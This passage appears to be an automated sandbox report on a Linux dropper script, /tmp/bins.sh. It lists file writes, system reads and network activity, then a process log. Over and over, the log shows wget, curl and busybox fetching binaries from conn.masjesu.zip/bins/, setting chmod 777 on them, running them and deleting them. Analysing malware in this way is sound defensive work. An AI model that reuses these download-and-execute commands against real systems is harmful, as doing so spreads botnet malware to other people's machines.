| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
